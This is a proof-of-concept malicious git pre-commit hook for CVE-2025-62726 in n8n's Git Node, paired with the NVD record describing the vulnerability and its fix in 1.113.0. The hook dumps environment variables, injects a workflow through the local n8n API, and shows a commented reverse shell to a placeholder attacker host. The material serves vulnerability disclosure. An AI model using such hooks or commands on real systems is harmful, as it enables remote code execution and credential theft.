CVE-2025-62726

# Malicious pre-commit hook for CVE-2025-62726 # This PoC demonstrates the vulnerability in n8n Git Node #!/bin/bash # Place this file in .git/hooks/pre-commit of a malicious repository # When victim performs commit operation in n8n Git Node, this hook will be executed echo "Pre-commit hook triggered!" >> /tmp/pwned.log # Example: Exfiltrate environment variables (may contain credentials) env > /tmp/n8n_env_$(date +%s).log # Example: Execute reverse shell # bash -i >& /dev/tcp/attacker_ip/port 2>&1 & # Example: Modify n8n workflows # curl -X POST http://localhost:5678/rest/workflows -H "Content-Type: application/json" -d '{"name":"Malicious Workflow","nodes":[],"connections":{}}' echo "Compromised n8n environment via pre-commit hook"

{"cve": {"id": "CVE-2025-62726", "sourceIdentifier": "[email protected]", "published": "2025-10-30T17:15:39.563", "lastModified": "2025-12-31T02:30:18.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. Prior to 1.113.0, a remote code execution vulnerability exists in the Git Node component available in both Cloud and Self-Hosted versions of n8n. When a malicious actor clones a remote repository containing a pre-commit hook, the subsequent use of the Commit operation in the Git Node can inadvertently trigger the hook’s execution. This allows attackers to execute arbitrary code within the n8n environment, potentially compromising the system and any connected credentials or workflows. This vulnerability is fixed in 1.113.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-829"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.113.0", "matchCriteriaId": "083CFFEC-6B4E-4EE6-8B18-EC0F503F75B6"}]}]}], "references": [{"url": "https://github.com/n8n-io/n8n/commit/5bf3db5ba84d3195bbe11bbd3c62f7086e090997", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/n8n-io/n8n/pull/19559", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-xgp7-7qjq-vg47", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}